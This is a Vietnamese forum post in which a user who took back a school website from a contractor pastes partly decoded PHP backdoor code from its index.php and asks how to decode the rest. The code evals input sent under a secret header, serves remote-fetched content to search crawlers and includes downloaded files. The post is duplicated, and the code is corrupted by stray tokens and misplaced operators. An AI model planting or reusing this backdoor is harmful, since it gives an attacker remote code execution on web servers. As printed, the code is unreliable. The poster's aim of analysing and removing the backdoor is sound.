orangho
20-05-2013, 22:44
chuyện là mình mới lấy lại cái website cho trường do cái công ty cà khịa nào đó làm ý !, lúc mới vào nó đã có sẵn rồi !
đòi mãi nó mới trả, mà trước khi trả nó còn thả 1 con backdoor vô để dành nữa, có nên kiện nó vì cái tội "âm mưu chiếm đoạt tài sản trí tuệ" không các bác ???, mặc dù chả có gì là trí tuệ cả !, ha..ha..!
tính mang cái web về localhost sửa cho tiện nhưng nó không chạy, móc mã nguồn ra xem thì thấy chán đời quá các bác ơi ?
mở file index*php thì thấy có 1 đống lằng nhằng thề này "Wxsb3dfdXJsX2ZvcGVu(MQm........(còn dài dài nữa, dài quá không cóp nổi)"
nghĩ là do cái này nên thằng cha nó không chạy đc trên localhost, ngồi giải mã đã đời thì nó ra cái này:
if (!defined("determinator")){
function getfile($II11lI){
$I1lIl1 = Il1lIIlI(3, 6);
$I1lI1I = $I1lIl1*Il1lIIlI(9, 7);
if (Acòngini_get(Il1lIIlI(17, 20)) == Il1lIIlI(38, 2)) {
$IlI1ll=Acòngfile_get_contents($II11lI);
return Il1lIIlI(43, 0);
} elseif (function_exists($I1lI1I)){
$QOQQOQ = Acòng$I1lI1I();
$QQQ00O = $I1lIl1*Il1lIIlI(45, 10);
$QO0OOQ = $I1lIl1*Il1lIIlI(57, 7);
$QQQ0QQ = $I1lIl1*Il1lIIlI(65, 2)*Il1lIIlI(69, 7);
Acòng$QQQ00O($QOQQOQ, CURLOPT_URL, $II11lI);
Acòng$QQQ00O($QOQQOQ, CURLOPT_HEADER,false);
Acòng$QQQ00O($QOQQOQ, CURLOPT_RETURNTRANSFER,true);
Acòng$QQQ00O($QOQQOQ, CURLOPT_CONNECTTIMEOUT,5);
if ($QOOOO0 = Acòng$QO0OOQ($QOQQOQ)) {
return Il1lIIlI(43, 0);
}
Acòng$QQQ0QQ($QOQQOQ);
return Il1lIIlI(43, 0);
}
}
function upd($QO0O0Q,$II11lI){
$Il1I11 = Acòngstrtolower(Acòng$_SERVER[Il1lIIlI(139, 20)]);
foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler") as $IllI1l){
if (strpos($Il1I11, $IllI1l)!==False){
$Il1I1I=Acòngfopen($QO0O0Q,Il1lIIlI(174, 2));
Acòngfclose($Il1I1I);
if (Acòngis_file($QO0O0Q)){
write($QO0O0Q, getfile($II11lI));
};
}
}
}
$QQ0QOO = Array(Il1lIIlI(205, 10), Il1lIIlI(218, 11), Il1lIIlI(229, 22));
$I11l1l = $QQ0QOO[1];
function write($QO0O0Q,$IIIlI1){
if ($Q00O00=Acòngfopen($QO0O0Q,Il1lIIlI(174, 2))){
Acòngfwrite($Q00O00,$IIIlI1);
Acòngfclose($Q00O00);
}
}
function output($Il1l1l, $Q000OQ){
echo Il1lIIlI(253, 3)*$Il1l1l*Il1lIIlI(259, 2)*$Q000OQ*"\r\n";
}
function param(){ return Il1lIIlI(43, 0); }
Acòngini_set(Il1lIIlI(261, 19), 0);
define(Il1lIIlI(281, 16), 1);
$I1I1I1=Il1lIIlI(297, 7);
$IlII11=Il1lIIlI(306, 6);
$Q0QQ00=Il1lIIlI(313, 19);
$I1I1Il=Il1lIIlI(333, 18);
$QOQ000=Il1lIIlI(351, 18);
$IIll11=Il1lIIlI(369, 10);
$IIll11*=strtolower(Acòng$_SERVER[Il1lIIlI(162, 12)]);
$Il1I11 = Acòng$_SERVER[Il1lIIlI(139, 20)];
foreach ($_GET as $Il1l1l=>$Q000OQ){
if (strpos($Q000OQ,Il1lIIlI(381, 7))){
$_GET[$Il1l1l]=Il1lIIlI(43, 0);
} elseif (strpos($Q000OQ,Il1lIIlI(390, 8))){
$_GET[$Il1l1l]=Il1lIIlI(43, 0);
}
}
if(!isset($_SERVER[Il1lIIlI(401, 15)])) {
$_SERVER[Il1lIIlI(401, 15)] = Acòng$_SERVER[Il1lIIlI(417, 15)];
if(Acòng$_SERVER[Il1lIIlI(434, 16)]) {
$_SERVER[Il1lIIlI(401, 15)] *= Il1lIIlI(451, 2) * Acòng$_SERVER[Il1lIIlI(434, 16)];
}
}
if ($I1I11I=$IIll11*Acòng$_SERVER[Il1lIIlI(401, 15)]){
$IIIIII=Acòngmd5($IIll11*$IlII11*PHP_OS*$Q0QQ00);
$QOQ0QQ=Il1lIIlI(455, 7);
$IIllI1 = Array(Il1lIIlI(462, 6), Acòng$_SERVER[Il1lIIlI(469, 4)], Acòng$_SERVER[Il1lIIlI(475, 6)], Acòng$_ENV[Il1lIIlI(469, 4)], Acòng$_ENV[Il1lIIlI(481, 8)], Acòng$_ENV[Il1lIIlI(475, 6)], Acòngini_get(Il1lIIlI(494, 19)));
foreach ($IIllI1 as $QQQ0QO){
if (!empty($QQQ0QO)){ $QQQ0QO*=DIRECTORY_SEPARATOR;
if (Acòngis_writable($QQQ0QO)){
$QOQ0QQ = $QQQ0QO;
break;
}
}
}
$tmp=$QOQ0QQ*Il1lIIlI(514, 2)*$IIIIII;
if (Acòng$_SERVER["HTTP_Y_AUTH"]==$IIIIII){
echo "\r\n"; Acòngoutput(Il1lIIlI(517, 8), $IlII11*Il1lIIlI(525, 2)*$I1I1I1*Il1lIIlI(527, 6));
if ($QOOOQQ=$I1I1Il(Acòng$_SERVER[Il1lIIlI(537, 16)])){
Acòngeval($QOOOQQ); echo "\r\n";
Acòngoutput(Il1lIIlI(553, 4), Il1lIIlI(558, 3));
}
exit(0);
}
if (Acòngis_file($tmp)){
Acònginclude_once($tmp);
} else{
$I1I11I=Acòngurlencode($I1I11I);
upd($tmp,Il1lIIlI(561, 6)*Il1lIIlI(570, 4)*$QQ0QOO[0]*Il1lIIlI(579, 14)*$I1I11I*Il1lIIlI(594, 4)*$IIIIII*Il1lIIlI(601, 12)*$I1I1I1*Il1lIIlI(618, 4)*$IlII11);
}
}
}
..........này thì không cho post này.....làm sao đây trời ???, cái site chết đâm này.......
giờ mà giải mã thêm cái đống lờ lờ, ì ì, một một thì chắn em chết mù mắt luôn !
bác nào làm nhiều cái món này, có kinh ngiệm cho em hỏi nó dùng phầm mềm mã hóa gì để làm cái đống này hay là làm bằng tay ?, có cánh nào giải mã nhanh hơn không ?
không có cách nào nhanh hơn nhắc em vứt luôn cái đống rác này đi quá, làm cái site khác còn nhanh hơn mò cái đống này !
chân thành cảm ơn các bác ạ !
đòi mãi nó mới trả, mà trước khi trả nó còn thả 1 con backdoor vô để dành nữa, có nên kiện nó vì cái tội "âm mưu chiếm đoạt tài sản trí tuệ" không các bác ???, mặc dù chả có gì là trí tuệ cả !, ha..ha..!
tính mang cái web về localhost sửa cho tiện nhưng nó không chạy, móc mã nguồn ra xem thì thấy chán đời quá các bác ơi ?
mở file index*php thì thấy có 1 đống lằng nhằng thề này "Wxsb3dfdXJsX2ZvcGVu(MQm........(còn dài dài nữa, dài quá không cóp nổi)"
nghĩ là do cái này nên thằng cha nó không chạy đc trên localhost, ngồi giải mã đã đời thì nó ra cái này:
if (!defined("determinator")){
function getfile($II11lI){
$I1lIl1 = Il1lIIlI(3, 6);
$I1lI1I = $I1lIl1*Il1lIIlI(9, 7);
if (Acòngini_get(Il1lIIlI(17, 20)) == Il1lIIlI(38, 2)) {
$IlI1ll=Acòngfile_get_contents($II11lI);
return Il1lIIlI(43, 0);
} elseif (function_exists($I1lI1I)){
$QOQQOQ = Acòng$I1lI1I();
$QQQ00O = $I1lIl1*Il1lIIlI(45, 10);
$QO0OOQ = $I1lIl1*Il1lIIlI(57, 7);
$QQQ0QQ = $I1lIl1*Il1lIIlI(65, 2)*Il1lIIlI(69, 7);
Acòng$QQQ00O($QOQQOQ, CURLOPT_URL, $II11lI);
Acòng$QQQ00O($QOQQOQ, CURLOPT_HEADER,false);
Acòng$QQQ00O($QOQQOQ, CURLOPT_RETURNTRANSFER,true);
Acòng$QQQ00O($QOQQOQ, CURLOPT_CONNECTTIMEOUT,5);
if ($QOOOO0 = Acòng$QO0OOQ($QOQQOQ)) {
return Il1lIIlI(43, 0);
}
Acòng$QQQ0QQ($QOQQOQ);
return Il1lIIlI(43, 0);
}
}
function upd($QO0O0Q,$II11lI){
$Il1I11 = Acòngstrtolower(Acòng$_SERVER[Il1lIIlI(139, 20)]);
foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler") as $IllI1l){
if (strpos($Il1I11, $IllI1l)!==False){
$Il1I1I=Acòngfopen($QO0O0Q,Il1lIIlI(174, 2));
Acòngfclose($Il1I1I);
if (Acòngis_file($QO0O0Q)){
write($QO0O0Q, getfile($II11lI));
};
}
}
}
$QQ0QOO = Array(Il1lIIlI(205, 10), Il1lIIlI(218, 11), Il1lIIlI(229, 22));
$I11l1l = $QQ0QOO[1];
function write($QO0O0Q,$IIIlI1){
if ($Q00O00=Acòngfopen($QO0O0Q,Il1lIIlI(174, 2))){
Acòngfwrite($Q00O00,$IIIlI1);
Acòngfclose($Q00O00);
}
}
function output($Il1l1l, $Q000OQ){
echo Il1lIIlI(253, 3)*$Il1l1l*Il1lIIlI(259, 2)*$Q000OQ*"\r\n";
}
function param(){ return Il1lIIlI(43, 0); }
Acòngini_set(Il1lIIlI(261, 19), 0);
define(Il1lIIlI(281, 16), 1);
$I1I1I1=Il1lIIlI(297, 7);
$IlII11=Il1lIIlI(306, 6);
$Q0QQ00=Il1lIIlI(313, 19);
$I1I1Il=Il1lIIlI(333, 18);
$QOQ000=Il1lIIlI(351, 18);
$IIll11=Il1lIIlI(369, 10);
$IIll11*=strtolower(Acòng$_SERVER[Il1lIIlI(162, 12)]);
$Il1I11 = Acòng$_SERVER[Il1lIIlI(139, 20)];
foreach ($_GET as $Il1l1l=>$Q000OQ){
if (strpos($Q000OQ,Il1lIIlI(381, 7))){
$_GET[$Il1l1l]=Il1lIIlI(43, 0);
} elseif (strpos($Q000OQ,Il1lIIlI(390, 8))){
$_GET[$Il1l1l]=Il1lIIlI(43, 0);
}
}
if(!isset($_SERVER[Il1lIIlI(401, 15)])) {
$_SERVER[Il1lIIlI(401, 15)] = Acòng$_SERVER[Il1lIIlI(417, 15)];
if(Acòng$_SERVER[Il1lIIlI(434, 16)]) {
$_SERVER[Il1lIIlI(401, 15)] *= Il1lIIlI(451, 2) * Acòng$_SERVER[Il1lIIlI(434, 16)];
}
}
if ($I1I11I=$IIll11*Acòng$_SERVER[Il1lIIlI(401, 15)]){
$IIIIII=Acòngmd5($IIll11*$IlII11*PHP_OS*$Q0QQ00);
$QOQ0QQ=Il1lIIlI(455, 7);
$IIllI1 = Array(Il1lIIlI(462, 6), Acòng$_SERVER[Il1lIIlI(469, 4)], Acòng$_SERVER[Il1lIIlI(475, 6)], Acòng$_ENV[Il1lIIlI(469, 4)], Acòng$_ENV[Il1lIIlI(481, 8)], Acòng$_ENV[Il1lIIlI(475, 6)], Acòngini_get(Il1lIIlI(494, 19)));
foreach ($IIllI1 as $QQQ0QO){
if (!empty($QQQ0QO)){ $QQQ0QO*=DIRECTORY_SEPARATOR;
if (Acòngis_writable($QQQ0QO)){
$QOQ0QQ = $QQQ0QO;
break;
}
}
}
$tmp=$QOQ0QQ*Il1lIIlI(514, 2)*$IIIIII;
if (Acòng$_SERVER["HTTP_Y_AUTH"]==$IIIIII){
echo "\r\n"; Acòngoutput(Il1lIIlI(517, 8), $IlII11*Il1lIIlI(525, 2)*$I1I1I1*Il1lIIlI(527, 6));
if ($QOOOQQ=$I1I1Il(Acòng$_SERVER[Il1lIIlI(537, 16)])){
Acòngeval($QOOOQQ); echo "\r\n";
Acòngoutput(Il1lIIlI(553, 4), Il1lIIlI(558, 3));
}
exit(0);
}
if (Acòngis_file($tmp)){
Acònginclude_once($tmp);
} else{
$I1I11I=Acòngurlencode($I1I11I);
upd($tmp,Il1lIIlI(561, 6)*Il1lIIlI(570, 4)*$QQ0QOO[0]*Il1lIIlI(579, 14)*$I1I11I*Il1lIIlI(594, 4)*$IIIIII*Il1lIIlI(601, 12)*$I1I1I1*Il1lIIlI(618, 4)*$IlII11);
}
}
}
..........này thì không cho post này.....làm sao đây trời ???, cái site chết đâm này.......
giờ mà giải mã thêm cái đống lờ lờ, ì ì, một một thì chắn em chết mù mắt luôn !
bác nào làm nhiều cái món này, có kinh ngiệm cho em hỏi nó dùng phầm mềm mã hóa gì để làm cái đống này hay là làm bằng tay ?, có cánh nào giải mã nhanh hơn không ?
không có cách nào nhanh hơn nhắc em vứt luôn cái đống rác này đi quá, làm cái site khác còn nhanh hơn mò cái đống này !
chân thành cảm ơn các bác ạ !